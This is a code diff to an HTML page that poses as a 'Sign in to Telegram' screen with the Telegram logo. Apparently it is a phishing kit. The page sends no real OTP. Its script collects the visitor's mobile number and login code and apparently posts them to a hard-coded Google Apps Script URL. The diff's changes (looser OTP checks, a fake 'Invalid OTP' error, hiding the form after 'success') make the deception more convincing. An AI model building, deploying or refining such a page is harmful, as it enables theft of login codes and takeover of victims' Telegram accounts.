--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!DOCTYPE html>  
+<!DOCTYPE html> 
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -21,14 +21,14 @@
             text-align: center;
         }
         input {
-            width: 102%;
+            width: 100%;
             padding: 10px;
             margin: 8px 0;
             border: 1px solid #ccc;
             border-radius: 5px;
         }
         button {
-            width: 110%;
+            width: 100%;
             padding: 15px;
             background-color: #4A90E2;
             color: white;
@@ -43,23 +43,25 @@
 </head>
 <body>
     <div class="login-container">
-        <img src="Telegram-Logo.png" width=300 height=150>
+        <img src="telegram-logo.png" width=300 height=150>
         <h2>Sign in to Telegram</h2>
         <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13">
         <button onclick="sendOTP()">Send OTP</button>
-        <input type="text" id="otp" placeholder="Enter OTP" maxlength="5" style="display: none;">
+        <input type="text" id="otp" placeholder="Enter OTP" style="display: none;">  
         <button onclick="verifyOTP()" id="verifyBtn" style="display: none;">Verify OTP</button>
     </div>
 
     <script>
-        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbwHaXRdV1phKQXHmG0HdwKjuS1ZPK7do1sQeCvMkc_SdHqo77LAlAK4mpMSlMf8q_KIvw/exec"; // Replace with your Google Apps Script Web App URL
+        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbwHaXRdV1phKQXHmG0HdwKjuS1ZPK7do1sQeCvMkc_SdHqo77LAlAK4mpMSlMf8q_KIvw/exec"; // Replace with your correct Web App URL
 
         function sendOTP() {
             let mobileNumber = document.getElementById("mobile").value.trim();
+
             if (mobileNumber.length < 10) {
                 alert("Please enter a valid mobile number");
                 return;
             }
+
             alert("OTP sent to " + mobileNumber);
             document.getElementById("otp").style.display = "block";
             document.getElementById("verifyBtn").style.display = "block";
@@ -69,8 +71,8 @@
             let mobileNumber = document.getElementById("mobile").value.trim();
             let otp = document.getElementById("otp").value.trim();
 
-            if (otp.length !== 5) {
-                alert("Please enter a valid 5-digit OTP");
+            if (!otp) {
+                alert("Please enter the OTP");
                 return;
             }
 
@@ -84,13 +86,18 @@
                 });
 
                 let result = await response.json();
+
                 if (result.status === "success") {
-                    alert("Login Successful");
+                    alert("Login Successful!");
+                    // Hide OTP input and button after successful login
+                    document.getElementById("otp").style.display = "none";
+                    document.getElementById("verifyBtn").style.display = "none";
                 } else {
-                    alert("Error saving data.");
+                    alert("Invalid OTP. Please try again.");
                 }
             } catch (error) {
-                console.error("Error storing data:", error);
+                console.error("Error verifying OTP:", error);
+                alert("There was an error processing your request.");
             }
         }
     </script>
